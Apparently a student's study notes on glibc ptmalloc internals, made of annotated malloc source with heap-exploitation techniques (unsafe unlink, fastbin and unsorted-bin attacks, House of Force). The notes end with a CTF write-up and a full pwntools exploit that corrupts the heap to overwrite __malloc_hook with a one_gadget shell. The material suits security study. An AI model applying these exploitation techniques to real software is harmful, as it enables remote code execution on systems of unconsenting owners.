# HEAP Detailed Notes

# ptmalloc

> ref
> https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/
> https://paper.seebug.org/255/
> https://ctf-wiki.github.io/ctf-wiki/pwn/heap/heap_implementation_details.html

## unlink

* double-linked list check
  * `FD->bk == P && BK->fd == P`
  * *corrupted double-linked list*
  * `r = &r-0x18` : the classic unsafe-unlink bypass on 64-bit: set `P->fd = &r - 0x18` and `P->bk = &r - 0x10`, where `r` is a pointer that stores `P` (see the sketch after the macro)

```C
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;                                                            \
    BK = P->bk;                                                            \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                  \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
    else {                                                                 \
        FD->bk = BK;                                                       \
        BK->fd = FD;                                                       \
        /* the rest is for large chunks only */                            \
        if (!in_smallbin_range (P->size)                                   \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {             \
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)     \
                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
              malloc_printerr (check_action,                               \
                               "corrupted double-linked list (not small)", \
                               P, AV);                                     \
            /* FD is not in the size list */                               \
            if (FD->fd_nextsize == NULL) {                                 \
                /* P is the only chunk in the size list: remove P and let  \
                   FD be the new size list entry */                        \
                if (P->fd_nextsize == P)                                   \
                  FD->fd_nextsize = FD->bk_nextsize = FD;                  \
                /* otherwise insert FD into the size list */               \
                else {                                                     \
                    FD->fd_nextsize = P->fd_nextsize;                      \
                    FD->bk_nextsize = P->bk_nextsize;                      \
                    P->fd_nextsize->bk_nextsize = FD;                      \
                    P->bk_nextsize->fd_nextsize = FD;                      \
                  }                                                        \
              } else {                                                     \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;              \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;              \
              }                                                            \
          }                                                                \
      }                                                                    \
}
```
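As a side note (my addition, not part of the glibc source above): a minimal sketch of how the `r = &r - 0x18` trick satisfies the check on 64-bit, assuming a writable pointer `r` that stores the address of the corrupted chunk `P`. All names here are illustrative.

```C
/* Hedged sketch: classic "unsafe unlink" layout on 64-bit.
   Assumes a writable global pointer `r` that holds the address of the
   corrupted chunk P.  fd sits at offset 0x10 and bk at 0x18. */
#include <stdint.h>
#include <stdio.h>

typedef struct chunk {
    uint64_t prev_size, size;
    struct chunk *fd, *bk;            /* fd at +0x10, bk at +0x18            */
} chunk;

chunk fake;                           /* stands in for chunk P               */
chunk *r = &fake;                     /* global pointer that stores P        */

int main(void)
{
    /* Forge P->fd / P->bk so the unlink check passes:                       */
    fake.fd = (chunk *)((char *)&r - 0x18);   /* then FD->bk reads *(&r) == P */
    fake.bk = (chunk *)((char *)&r - 0x10);   /* then BK->fd reads *(&r) == P */

    chunk *P = &fake, *FD = P->fd, *BK = P->bk;
    printf("check passes: %d\n", FD->bk == P && BK->fd == P);

    /* unlink then performs the two writes below, both landing on &r         */
    FD->bk = BK;
    BK->fd = FD;
    printf("r == &r - 0x18: %d\n",
           (void *)r == (void *)((char *)&r - 0x18));
    return 0;
}
```

After the two writes, `r` ends up pointing 0x18 bytes before itself, which is what the bullet above abbreviates as `r = &r-0x18`.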
## _int_malloc

> from `__libc_malloc`
>
> 1. check __malloc_hook
> 2. arena_get
> 3. **_int_malloc()**
> 4. if it failed, retry with another arena

---

* Convert the request size to the internal form (add `SIZE_SZ` overhead, apply the alignment mask, enforce `MINSIZE`)
  * **fastbin attack** : a forged chunk size such as `0x7?` does not trigger any error and is treated the same as `0x70` (see the sketch after section I's code)

```C
  /*
     Convert request size to internal form by adding SIZE_SZ bytes
     overhead plus possibly more to obtain necessary alignment and/or
     to obtain a size of at least MINSIZE, the smallest allocatable
     size. Also, checked_request2size traps (returning 0) request sizes
     that are so large that they wrap around zero when padded and
     aligned.
   */

  checked_request2size (bytes, nb);

----------------------------------------

/*
   Check if a request is so large that it would wrap around zero when
   padded and aligned. To simplify some other code, the bound is made
   low enough so that adding MINSIZE will also not wrap around zero.
 */

#define REQUEST_OUT_OF_RANGE(req)                                 \
  ((unsigned long) (req) >=                                       \
   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))

/* pad request bytes into a usable size -- internal version */

#define request2size(req)                                         \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
   MINSIZE :                                                      \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

/*  Same, except also perform argument check */

#define checked_request2size(req, sz)                             \
  if (REQUEST_OUT_OF_RANGE (req)) {                               \
      __set_errno (ENOMEM);                                       \
      return 0;                                                   \
    }                                                             \
  (sz) = request2size (req);
```

* No usable arena => `sysmalloc`

```C
  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
     mmap.  */
  if (__glibc_unlikely (av == NULL))
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }
```

### I. Is fastbin

* Check whether the size qualifies as a fastbin size
  * **global_max_fast**
* Take a chunk from the fastbin whose index corresponds to the requested size
  * `malloc_state.fastbinsY[]`
* Check that the index derived from the chunk's size matches the requested index
  * the index is computed from an **unsigned int** cast
  * *malloc(): memory corruption (fast)*

#### If found : return
#### ELSE : go [IV. Unsorted bin](#IV-Unsorted-bin)

```C
  /*
     If the size qualifies as a fastbin, first check corresponding bin.
     This code is safe to execute even if av is not yet initialized, so we
     can try it without checking, which saves some time on this fast path.
   */

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp = *fb;
      do
        {
          victim = pp;
          if (victim == NULL)
            break;
        }
      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
             != victim);
      if (victim != 0)
        {
          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
            errout:
              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
              return NULL;
            }
          check_remalloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
```
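The only integrity check on the fastbin path is `fastbin_index (chunksize (victim)) == idx`. A minimal sketch (my addition) that re-implements the two macros as they appear in glibc 2.23 for 64-bit shows why a forged size like `0x7f` lands in the same bin as a `0x70` request; this is the `0x7?` trick used for the fake chunks in front of `__malloc_hook` / `__free_hook` later in these notes.

```C
/* Hedged sketch: why a forged size 0x7f passes the fastbin check for a
   0x70 request on 64-bit (SIZE_SZ == 8).  The two helpers mirror the
   glibc 2.23 macros fastbin_index() and chunksize(). */
#include <stdio.h>

#define SIZE_BITS 0x7UL                    /* PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA */
#define chunksize(sz)      ((sz) & ~SIZE_BITS)
#define fastbin_index(sz)  ((((unsigned int) (sz)) >> 4) - 2)

int main(void)
{
    unsigned long nb     = 0x70;   /* internal size for a malloc(0x68) request      */
    unsigned long forged = 0x7f;   /* fake size, e.g. read out of a 0x7f.. pointer  */

    printf("idx(request 0x70) = %u\n", fastbin_index(nb));                 /* 5 */
    printf("idx(forged  0x7f) = %u\n", fastbin_index(chunksize(forged)));  /* 5 */
    return 0;
}
```

Both indexes are 5, so the `memory corruption (fast)` check never fires, which is exactly what the `fake_size = 0x70` comment in the exploit at the end of these notes relies on.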
### II. Is small

* Take the last chunk in the bin (`last (bin)`, i.e. `bin->bk`) as victim
* double-linked list check
  * `bck->fd == victim` (only one direction is checked?)
  * *malloc(): smallbin double linked list corrupted*
* remove victim
  * `bin->bk = bck ; bck->fd = bin`

#### If found : return
#### ELSE : go [IV. Unsorted bin](#IV-Unsorted-bin)

```C
  /*
     If a small request, check regular bin.  Since these "smallbins"
     hold one size each, no searching within bins is necessary.
     (For a large request, we need to wait until unsorted chunks are
     processed to find best fit. But for small ones, fits are exact
     anyway, so we can check now, which is faster.)
   */

  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          if (victim == 0) /* initialization check */
            malloc_consolidate (av);
          else
            {
              bck = victim->bk;
              if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;

              if (av != &main_arena)
                victim->size |= NON_MAIN_ARENA;
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
        }
    }
```

### III. Is large

* First consolidate the fastbins (`malloc_consolidate`).

#### III-I. go [IV. Unsorted bin](#IV-Unsorted-bin)

#### III-II. Smallest fit

* go to [V. Larger bin](#V-Larger-bin) if the bin is empty or its largest chunk is too small
* scan from the largest end (via `bk_nextsize`) to find the smallest chunk that fits
* unlink the victim
* If the remaining size is still large enough to be a chunk (`>= MINSIZE`), split it off and insert the remainder back into the unsorted bin
* check list
  * `fwd->bk == unsorted_chunks (av)`
  * *malloc(): corrupted unsorted chunks*

```C
  if (!in_smallbin_range (nb))
    {
      bin = bin_at (av, idx);

      /* skip scan if empty or largest chunk is too small */
      if ((victim = first (bin)) != bin &&
          (unsigned long) (victim->size) >= (unsigned long) (nb))
        {
          victim = victim->bk_nextsize;
          while (((unsigned long) (size = chunksize (victim)) <
                  (unsigned long) (nb)))
            victim = victim->bk_nextsize;

          /* Avoid removing the first entry for a size so that the skip
             list does not have to be rerouted.  */
          if (victim != last (bin) && victim->size == victim->fd->size)
            victim = victim->fd;

          remainder_size = size - nb;
          unlink (av, victim, bck, fwd);

          /* Exhaust */
          if (remainder_size < MINSIZE)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
                victim->size |= NON_MAIN_ARENA;
            }
          /* Split */
          else
            {
              remainder = chunk_at_offset (victim, nb);
              /* We cannot assume the unsorted list is empty and therefore
                 have to perform a complete insert here.  */
              bck = unsorted_chunks (av);
              fwd = bck->fd;
              if (__glibc_unlikely (fwd->bk != bck))
                {
                  errstr = "malloc(): corrupted unsorted chunks";
                  goto errout;
                }
              remainder->bk = bck;
              remainder->fd = fwd;
              bck->fd = remainder;
              fwd->bk = remainder;
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }
              set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
              set_head (remainder, remainder_size | PREV_INUSE);
              set_foot (remainder, remainder_size);
            }
          check_malloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
```

### IV. Unsorted bin

* size check
  * `victim->size > 2 * SIZE_SZ` and `victim->size <= av->system_mem` must hold
  * *malloc(): memory corruption*

---

#### IV-I. Last remainder (for small)

* For a **small request**, reuse the last remainder if it is the only chunk in the unsorted bin and it is large enough.

```C
          if (in_smallbin_range (nb) &&
              bck == unsorted_chunks (av) &&
              victim == av->last_remainder &&
              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
            {
              /* split and reattach remainder */
              remainder_size = size - nb;
              remainder = chunk_at_offset (victim, nb);
              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
              av->last_remainder = remainder;
              remainder->bk = remainder->fd = unsorted_chunks (av);
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }

              set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
              set_head (remainder, remainder_size | PREV_INUSE);
              set_foot (remainder, remainder_size);

              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
```

---

* Remove victim from the unsorted bin
  * `unsorted_chunks (av)->bk = bck ; bck->fd = unsorted_chunks (av)`
  * **No double-linked list check**
  * **unsorted bin attack** : by corrupting `victim->bk`, write the unsorted bin address (a large libc value) to an arbitrary location (see the sketch after the code below)

#### IF exact fit

* **return**
* In an **unsorted bin attack** we usually **request the exact fit size**, so `malloc` returns right here and never walks the now-broken list any further.

#### ELSE

* place the chunk into its corresponding bin
  * small : just insert (no sorting needed; chunks are later taken from the back, FIFO)
  * large : keep the bin in sorted order
    * fd, bk => chunks of the same size
    * fd_nextsize, bk_nextsize => next size level

##### IF is large : go [III-II. Smallest fit](#III-II-Smallest-fit)

```C
          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

          /* Take now instead of binning if exact fit */

          if (size == nb)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
                victim->size |= NON_MAIN_ARENA;
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }

          /* place chunk in bin */

          if (in_smallbin_range (size))
            {
              victim_index = smallbin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;
            }
          else
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;

              /* maintain large bins in sorted order */
              if (fwd != bck)
                {
                  /* Or with inuse bit to speed comparisons */
                  size |= PREV_INUSE;
                  /* if smaller than smallest, bypass loop below */
                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
                    {
                      fwd = bck;
                      bck = bck->bk;

                      victim->fd_nextsize = fwd->fd;
                      victim->bk_nextsize = fwd->fd->bk_nextsize;
                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
                    }
                  else
                    {
                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
                      while ((unsigned long) size < fwd->size)
                        {
                          fwd = fwd->fd_nextsize;
                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
                        }

                      if ((unsigned long) size == (unsigned long) fwd->size)
                        /* Always insert in the second position.  */
                        fwd = fwd->fd;
                      else
                        {
                          victim->fd_nextsize = fwd;
                          victim->bk_nextsize = fwd->bk_nextsize;
                          fwd->bk_nextsize = victim;
                          victim->bk_nextsize->fd_nextsize = victim;
                        }
                      bck = fwd->bk;
                    }
                }
              else
                victim->fd_nextsize = victim->bk_nextsize = victim;
            }

          mark_bin (av, victim_index);
          victim->bk = bck;
          victim->fd = fwd;
          fwd->bk = victim;
          bck->fd = victim;
```
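The two unchecked writes above are the whole unsorted bin attack. A minimal sketch (my addition, using simulated chunks and made-up names rather than real glibc state) of what happens when `victim->bk` has been overwritten:

```C
/* Hedged sketch of the unsorted bin attack, simulated with a fake bin head
   and a fake chunk instead of a real arena.  All names are illustrative. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct chunk {
    uint64_t prev_size, size;
    struct chunk *fd, *bk;
} chunk;

static chunk  unsorted_head;     /* stands in for unsorted_chunks(av)          */
static chunk *target;            /* e.g. a word in front of __free_hook        */

int main(void)
{
    chunk victim = { 0, 0x91, &unsorted_head, &unsorted_head };
    unsorted_head.fd = unsorted_head.bk = &victim;

    /* attacker: overwrite victim->bk so that bck->fd lands on the target      */
    victim.bk = (chunk *)((char *)&target - offsetof(chunk, fd));

    /* what _int_malloc does on removal (no integrity check at all):           */
    chunk *bck = victim.bk;
    unsorted_head.bk = bck;      /* unsorted_chunks (av)->bk = bck;             */
    bck->fd = &unsorted_head;    /* bck->fd = unsorted_chunks (av);  <- write   */

    printf("*target = %p (address of the bin head, a large 0x7f.. value in libc)\n",
           (void *)target);
    return 0;
}
```

Only the bin head's address can be written, so the attack is typically used to plant a large `0x7f...` value (as in the `__free_hook` trick later in these notes) rather than to gain control directly; requesting the exact fit size makes `malloc` return immediately afterwards.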
### V. Larger bin

* No chunk in the requested bin fits, so move on to the larger bins (scanned via the binmap).
* check list (when splitting and re-inserting the remainder)
  * `bck = unsorted_chunks (av)` ; `fwd->bk == bck`
  * *malloc(): corrupted unsorted chunks 2*

```C
  /*
     Search for a chunk by scanning bins, starting with next largest
     bin. This search is strictly by best-fit; i.e., the smallest
     (with ties going to approximately the least recently used) chunk
     that fits is selected.

     The bitmap avoids needing to check that most blocks are nonempty.
     The particular case of skipping all bins during warm-up phases
     when no chunks have been returned yet is faster than it might look.
   */

  ++idx;
  bin = bin_at (av, idx);
  block = idx2block (idx);
  map = av->binmap[block];
  bit = idx2bit (idx);

  for (;; )
    {
      /* Skip rest of block if there are no more set bits in this block.  */
      if (bit > map || bit == 0)
        {
          do
            {
              if (++block >= BINMAPSIZE) /* out of bins */
                goto use_top;
            }
          while ((map = av->binmap[block]) == 0);

          bin = bin_at (av, (block << BINMAPSHIFT));
          bit = 1;
        }

      /* Advance to bin with set bit. There must be one. */
      while ((bit & map) == 0)
        {
          bin = next_bin (bin);
          bit <<= 1;
          assert (bit != 0);
        }

      /* Inspect the bin. It is likely to be non-empty */
      victim = last (bin);

      /*  If a false alarm (empty bin), clear the bit. */
      if (victim == bin)
        {
          av->binmap[block] = map &= ~bit; /* Write through */
          bin = next_bin (bin);
          bit <<= 1;
        }
      else
        {
          size = chunksize (victim);

          /*  We know the first chunk in this bin is big enough to use. */
          assert ((unsigned long) (size) >= (unsigned long) (nb));

          remainder_size = size - nb;

          /* unlink */
          unlink (av, victim, bck, fwd);

          /* Exhaust */
          if (remainder_size < MINSIZE)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
                victim->size |= NON_MAIN_ARENA;
            }

          /* Split */
          else
            {
              remainder = chunk_at_offset (victim, nb);

              /* We cannot assume the unsorted list is empty and therefore
                 have to perform a complete insert here.  */
              bck = unsorted_chunks (av);
              fwd = bck->fd;
              if (__glibc_unlikely (fwd->bk != bck))
                {
                  errstr = "malloc(): corrupted unsorted chunks 2";
                  goto errout;
                }
              remainder->bk = bck;
              remainder->fd = fwd;
              bck->fd = remainder;
              fwd->bk = remainder;

              /* advertise as last remainder */
              if (in_smallbin_range (nb))
                av->last_remainder = remainder;
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }
              set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
              set_head (remainder, remainder_size | PREV_INUSE);
              set_foot (remainder, remainder_size);
            }
          check_malloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
```

### VI. Top

* If the top chunk is large enough, split the request off it
  * `size >= nb + MINSIZE`
  * **House of Force**
    * `nb` can be effectively **negative** (a huge unsigned value), see the sketch after the code
* Otherwise the top is replenished by `sysmalloc`

```C
use_top:
  /*
     If large enough, split off the chunk bordering the end of memory
     (held in av->top). Note that this is in accord with the best-fit
     search rule.  In effect, av->top is treated as larger (and thus
     less well fitting) than any other available chunk since it can be
     extended to be as large as necessary (up to system limitations).

     We require that av->top always exists (i.e., has size >=
     MINSIZE) after initialization, so if it would otherwise be
     exhausted by current request, it is replenished. (The main
     reason for ensuring it exists is that we may need MINSIZE space
     to put in fenceposts in sysmalloc.)
   */

  victim = av->top;
  size = chunksize (victim);

  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
      remainder_size = size - nb;
      remainder = chunk_at_offset (victim, nb);
      av->top = remainder;
      set_head (victim, nb | PREV_INUSE |
                (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_head (remainder, remainder_size | PREV_INUSE);

      check_malloced_chunk (av, victim, nb);
      void *p = chunk2mem (victim);
      alloc_perturb (p, bytes);
      return p;
    }

  /* When we are using atomic ops to free fast chunks we can get
     here for all block sizes.  */
  else if (have_fastchunks (av))
    {
      malloc_consolidate (av);
      /* restore original bin index */
      if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
      else
        idx = largebin_index (nb);
    }

  /* Otherwise, relay to handle system-dependent cases */
  else
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }
```
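A minimal sketch of the House of Force arithmetic this enables (my illustration; the addresses are made up): once the top chunk's size field has been overwritten with `-1`, the `size >= nb + MINSIZE` check above passes for practically any request, so a single forged request moves `av->top` onto a chosen target.

```C
/* Hedged sketch of House of Force arithmetic on 64-bit.  No real heap is
   touched; top and target addresses are illustrative only. */
#include <stdint.h>
#include <stdio.h>

#define MINSIZE 0x20UL

int main(void)
{
    uint64_t top      = 0x0000555555560000;   /* current av->top (example)       */
    uint64_t top_size = (uint64_t) -1;        /* top size overwritten with -1    */
    uint64_t target   = 0x00007ffff7a0b000;   /* e.g. just before __malloc_hook  */

    /* av->top = chunk_at_offset(victim, nb)  =>  choose nb = target - top       */
    uint64_t nb = target - top;

    /* the only guard: (unsigned long) size >= (unsigned long) (nb + MINSIZE)    */
    printf("check passes: %d\n", top_size >= nb + MINSIZE);

    uint64_t new_top = top + nb;              /* av->top after the split         */
    printf("new top = 0x%lx (== target: %d)\n",
           (unsigned long) new_top, new_top == target);
    return 0;
}
```

The next `malloc` of a suitable size then hands back memory at the target, which is why being able to pass an effectively negative `nb` matters.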
## _int_free

TODO

# CTF

## Secret Of My Heart [400 pts] - pwnable.tw

* Solutions
  * Worked
    * shrink heap => fast bin corruption 0x70 => overwrite __malloc_hook with one_gadget_rce
    * shrink heap => unsorted bin attack => set 0x7??? in front of __free_hook => fast bin corruption 0x70 => overwrite __free_hook with system (**no one_gadget_rce needed!!**)
  * Tried (did not work)
    * tls_dtor_list : the memory right before it is read-only
    * global_max_fast : nowhere to do a fastbin attack afterwards
    * check_action : ..doesn't seem very useful??
  * Other people's solutions
    * file stream
      * std
      * _IO_list_all (about the abort routine)
    * ROP

### tls_dtor_list

* `exit()` -> `__GI_exit()` -> `__run_exit_handlers()` -> `__GI___call_tls_dtors()` (see the sketch after the code)

```C
// glibc/stdlib/cxa_thread_atexit_impl.c

typedef void (*dtor_func) (void *);

struct dtor_list
{
  dtor_func func;
  void *obj;
  struct link_map *map;
  struct dtor_list *next;
};

static __thread struct dtor_list *tls_dtor_list;

...

/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);

      /* Ensure that the MAP dereference happens before
         l_tls_dtor_count decrement.  That way, we protect this access from a
         potential DSO unload in _dl_close_worker, which happens when
         l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}
libc_hidden_def (__call_tls_dtors)
```
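One reason this route is awkward (my note, not from the original attempt above): `cur->func` is stored mangled, and on x86_64 `PTR_DEMANGLE` rotates it right by 0x11 and XORs it with the per-thread pointer guard before the call. A small sketch of that transform, with a made-up guard value:

```C
/* Hedged sketch of x86_64 pointer (de)mangling applied to tls_dtor_list
   entries: demangled = ror(mangled, 0x11) ^ pointer_guard.  The guard
   normally lives in the thread control block and is unknown upfront. */
#include <stdint.h>
#include <stdio.h>

static uint64_t rol(uint64_t v, unsigned n) { return (v << n) | (v >> (64 - n)); }
static uint64_t ror(uint64_t v, unsigned n) { return (v >> n) | (v << (64 - n)); }

int main(void)
{
    uint64_t pointer_guard = 0xdeadbeefcafebabe;   /* made-up guard value          */
    uint64_t func          = 0x00007ffff7a52390;   /* illustrative target pointer  */

    uint64_t mangled   = rol(func ^ pointer_guard, 0x11);    /* PTR_MANGLE    */
    uint64_t demangled = ror(mangled, 0x11) ^ pointer_guard; /* PTR_DEMANGLE  */

    printf("round trip ok: %d\n", demangled == func);
    return 0;
}
```

So forging a `dtor_list` entry requires knowing or overwriting the pointer guard in addition to pointing `tls_dtor_list` at controlled memory, which makes this noticeably harder than the hook overwrites used below.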
---

* https://xianzhi.aliyun.com/forum/topic/1770 (stdin->_IO_base_end, malloc_hook)
* [LCTF2017-2ez4u](https://bbs.pediy.com/thread-223283-1.htm) (large bins, fastbin attack, main_arena.top)
* Project Zero
  * https://googleprojectzero.blogspot.tw/2014/08/the-poisoned-nul-byte-2014-edition.html
* http://v0ids3curity.blogspot.tw/2015/02/revisiting-defcon-ctf-shitsco-use-after.html (check_action / large bin unlink)
* [House of Orange](http://4ngelboy.blogspot.tw/2016/10/hitcon-ctf-qual-2016-house-of-orange.html)
* [sol.py](https://github.com/ktecv2000/CTF_writeup/blob/master/pwnable.tw/Secret%20Of%20My%20Heart/sol.py)

* After reading other people's writeups, it turns out the solutions can be roughly classified by whether they need `one_gadget_rce` or not.
  * Not using `one_gadget_rce` looks more involved (ROP on the stack, a vtable, or something similar).
  * Overwriting `__malloc_hook` with `one_gadget_rce` is largely a matter of luck (whether the gadget's constraints happen to hold).
* The memory around `&__free_hook` is all zeros, so a simple fast bin attack cannot hijack it directly: there is no usable fake size nearby.
* Then I came up with an idea:
  * first do an unsorted bin attack to write the unsorted bin address (`0x7?????...`) in front of `&__free_hook`
  * then do a fast bin attack with size `0x70` to hijack `__free_hook`! (sketch below)
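Before the script, a minimal sketch (my illustration; the buffer layout and the planted value are made up) of why a libc pointer written in front of `&__free_hook` gives a usable fake fastbin size: read misaligned, its `0x7f` byte becomes the low byte of the size field, and since the surrounding bytes are zero the fake chunk passes the `fastbin_index` check for a `0x70` request.

```C
/* Hedged sketch: a planted libc pointer (0x00007f....) near __free_hook can
   serve as a fake fastbin size when the fake chunk is placed misaligned.
   The buffer and offsets below are illustrative only. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define fastbin_index(sz)  ((((unsigned int) (sz)) >> 4) - 2)

int main(void)
{
    unsigned char mem[0x40] = { 0 };           /* pretend: zeros around __free_hook      */
    uint64_t planted = 0x00007ffff7dd1b78;     /* value written by the unsorted bin attack */

    memcpy(&mem[0x08], &planted, sizeof planted);   /* attack target = &mem[0x08]        */

    /* Place the fake chunk so its size field starts on the 0x7f byte of the
       little-endian pointer; the 7 bytes after it are all zero.               */
    uint64_t fake_size;
    memcpy(&fake_size, &mem[0x08 + 5], sizeof fake_size);

    printf("fake size = 0x%lx\n", (unsigned long) fake_size);            /* 0x7f */
    printf("same bin as a 0x70 request: %d\n",
           fastbin_index(fake_size & ~0x7UL) == fastbin_index(0x70));    /* 1 */
    return 0;
}
```

The script below actually targets `__malloc_hook` with the same `0x7f` idea, using pointers that already sit in libc in front of the hook, which is why `fake_chunk_to_hook` is `0x1b + 8`.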
```python
from pwn import *

#p = process('./secret_of_my_heart')
p = remote('chall.pwnable.tw', 10302)
e = ELF('./secret_of_my_heart')
l = ELF('./libc_64.so.6')
#l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#gdb.attach(p)

main_arena_offset = 0x3c3b20
#main_arena_offset = 0x39db00

def add(sz, name='A'*32, secret='1234'):
    p.sendafter('Your choice :', '1')
    p.sendafter('Size of heart :', str(sz))
    p.sendafter('Name of heart :', name)
    p.sendafter('secret of my heart :', secret)

def show(i):
    p.sendafter('Your choice :', '2')
    p.sendlineafter('Index :', str(i))

def delete(i):
    p.sendafter('Your choice :', '3')
    p.sendlineafter('Index :', str(i))

# shrink the heap to get overlap chunk
add(0x20)
add(0x100, secret = 'A'*0xf0 + p64(0x100))
add(0x100) #2
delete(1)
delete(0)
add(0x28, secret='A'*0x20 + p64(0)) #0, off-by-one NULL -> overwrite 1's size
add(0x80) #1
add(0x10) #3
delete(1)
delete(2)

# leak libc : get two same chunks, free one and print the other
add(0x80) #1
add(0x80, secret = 'B'*(0x60+8) + #3 (== 2)
    p64(0x21)) # to bypass `invalid next size (fast)` for later use
add(0x80) #4
delete(3) # write fd, bk on chunk 3 (== 2)
show(2)
p.recvuntil('Secret : ')
libc_addr = u64(p.recvline()[:-1].ljust(8, "\x00")) - (main_arena_offset + 0x58)
log.info('Libc : ' + hex(libc_addr))
log.info('__malloc_hook : ' + hex(libc_addr + l.symbols['__malloc_hook']))

fake_chunk_to_hook = 0x1b + 8
fake_fd = libc_addr + (l.symbols['__malloc_hook'] - fake_chunk_to_hook)
fake_size = 0x70 # 0x7? pass size check and classified as 0x70 fastbin
system_addr = libc_addr + l.symbols['system']

# overwrite __malloc_hook with one_gadget_rce
#rce_offset = [0x40beb, 0x40c3f, 0xd9935]
rce_offset = [0x45216, 0x4526a, 0xef6c4, 0xf0567]

# overwrite victim's size and free
delete(1)
add(0x100, secret = 'C'*(0x80+8) + p64(fake_size))
delete(2)

# overwrite victim's fd
delete(1)
add(0x100, secret = 'C'*(0x80+8) + p64(fake_size) + p64(fake_fd))

# overwrite __malloc_hook
add(fake_size - 0x10)
add(fake_size - 0x10, secret = 'D'*(fake_chunk_to_hook - 0x10) + p64(libc_addr + rce_offset[2]))

delete(3) # <- really lucky :)
p.interactive()
```